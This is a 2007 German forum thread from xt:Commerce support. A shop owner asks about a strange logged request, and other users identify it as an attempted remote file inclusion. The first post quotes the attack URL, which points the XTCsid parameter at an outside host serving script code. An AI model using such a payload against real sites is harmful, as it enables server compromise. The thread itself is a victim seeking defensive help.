#1 (permalink)  
Alt 01.11.2007, 18:33
xt:Commerce Support Kunde
 
Registriert seit: 06.12.2006
Beiträge: 114
Standard Kennt das einer von Euch? Was tun?

Hallo Zusammen,

in beobachte in den letzten Tag im Whois folgenden Eintrag bei der URL:
Zitat:
/index.php?XTCsid=http://cherrygirl.h18.ru/images/cs.txt?
Normalerweise wird ja nur der besuchte Link angezeigt (diesen gibts aber ganz sicher nicht bei uns), mir kommt das alles seltsam vor.

Kennt das jemand von Euch? Ist das der Versuch etwas auf meinem Server zu installieren/zu speichern, zu hacken?
Gestern hatte ich das mal ohne meine URL aufgerufen, da sah man dann jede Menge Script-Text

Was kann/sollte ich in dem Fall machen?
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #2 (permalink)  
Alt 02.11.2007, 12:32
xt:Commerce Support Kunde
 
Registriert seit: 06.12.2006
Beiträge: 114
Standard

Keiner eine Idee?
Wenn man danach googelt werden recht viele Seiten dazu angezeigt, als wenn sich das einfach anheftet.
Kann mir nicht vorstellen, dass ich der einzige bin, dem das passiert - aber vielleicht einer der wenigen, dem das auffällt
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #3 (permalink)  
Alt 02.11.2007, 12:55
Erfahrener Benutzer
 
Registriert seit: 02.05.2007
Beiträge: 149
Standard

Als Security-Laie vermute ich mal, daß da jemand Code einschleusen will. Er kennt halt nur die XTCsid. Als nächstes sucht er sich irgendeine andere Variable und irgendwann hat er vielleicht eine Schwachstelle gefunden.

Mich würde das schon auch interessieren...
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #4 (permalink)  
Alt 02.11.2007, 17:42
tuvalu
Gast
 
Beiträge: n/a
Standard

Es versucht jemand mit der aufgerufenen URL über Deinen Server seinen Code auszuführen. Das klappt aber nicht. Taucht früher oder später in jedem Shop auf. Hatte ich auch des öfteren.
Auch beliebt, beim Suchfeld zusätzliche Javascript oder php Befehlen anzuhängen. Da hilft es, das Suchfeld auf ca. 25 oder 20 Zeichen zu beschränken. Obwohl der Shop so auch nicht unbedingt zu knacken ist.

@Numerobis Wenn Du nur Laie bist, mach keine Panik!

tuvalu
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
Antwort

Lesezeichen

Stichworte
euch, kennt, tun

Themen-Optionen
Ansicht

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are aus
Pingbacks are aus
Refbacks are aus



Alle Zeitangaben in WEZ +1. Es ist jetzt 14:41 Uhr.

Copyright © 2011 xt:Commerce GmbH / xt:Commerce International Ltd. - All Rights Reserved

xt:Commerce is a SafeCharge brand